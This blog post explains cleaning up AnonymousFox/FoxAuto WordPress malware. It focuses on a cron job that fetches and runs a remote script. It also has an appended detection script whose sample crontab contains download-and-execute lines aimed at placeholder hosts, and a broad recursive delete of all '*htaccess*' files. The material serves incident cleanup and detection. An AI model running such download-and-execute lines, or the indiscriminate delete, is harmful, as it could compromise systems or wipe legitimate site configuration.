FoxAuto WordPress malware

The AnonymousFox Hack guide by Sucuri misses a huge step in cleaning a hacked WordPress website: removing the cronjobs.

While removing AnonymousFox malware from a website I noticed the following cron:

It downloads a script from http://hello.hahaha666.xyz/xxxd and runs it. The script is:

It creates a new folder named css and replaces the index.php file with http://hello.hahaha666.xyz/wp-class.txt

source code:

This file then modifies the default .htaccess and creates a .htaccess file inside every directory. These .htaccess files can be found by using the command:

grep -r "Deny from all" .

To remove all these .htaccess files:

find . -type f -name '*htaccess*' -delete
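
The two checks above (cron entries that fetch and run a remote script, and .htaccess files carrying the "Deny from all" marker) as an added example that is not part of the original post. The function names, hostnames and sample crontab are constructed for illustration, and the helpers only list findings for review.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.

# Constructed sample crontab; the hostnames are placeholders, not indicators.
sample_crontab() {
cat <<'EOF'
# m h dom mon dow command
*/5 * * * * wget -q -O - https://blog.example.invalid/wp-cron.php >/dev/null 2>&1
*/10 * * * * curl -fsSL http://payload.example.invalid/x | sh >/dev/null 2>&1
0 3 * * * /usr/local/bin/backup.sh
@reboot wget -q -O /tmp/.u http://payload.example.invalid/x; sh /tmp/.u
EOF
}

# Read crontab text on stdin; print entries that both download something and
# hand control to an interpreter after a |, ; or &&. Comments are skipped.
suspicious_cron_lines() {
    grep -Ev '^[[:space:]]*(#|$)' |
        grep -E '(^|[^[:alnum:]_])(curl|wget|fetch)[[:space:]]' |
        grep -E '[|;&][[:space:]]*(sh|bash|php|perl|python[0-9.]*)([[:space:]]|$)'
}

# List .htaccess files under directory $1 that contain "Deny from all".
# Searching from the directory itself also covers the top-level dotfile.
# Nothing is deleted: the directive can appear in legitimate files too,
# so the output is a list to review.
list_deny_htaccess() {
    find "$1" -type f -name '.htaccess' -exec grep -l 'Deny from all' {} + | sort
}

# Typical use on a live host (site user and web root are placeholders):
#   crontab -l -u SITE_USER | suspicious_cron_lines
#   list_deny_htaccess /path/to/webroot
```

The plain wget call to wp-cron.php in the sample is not reported, because it downloads without passing the result to an interpreter.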

As mentioned at the beginning of the post, checking and removing cronjobs is necessary when cleaning up hacked WordPress websites, and I hope that Sucuri will eventually include it in their “fix FoxAuto WordPress malware” guide.
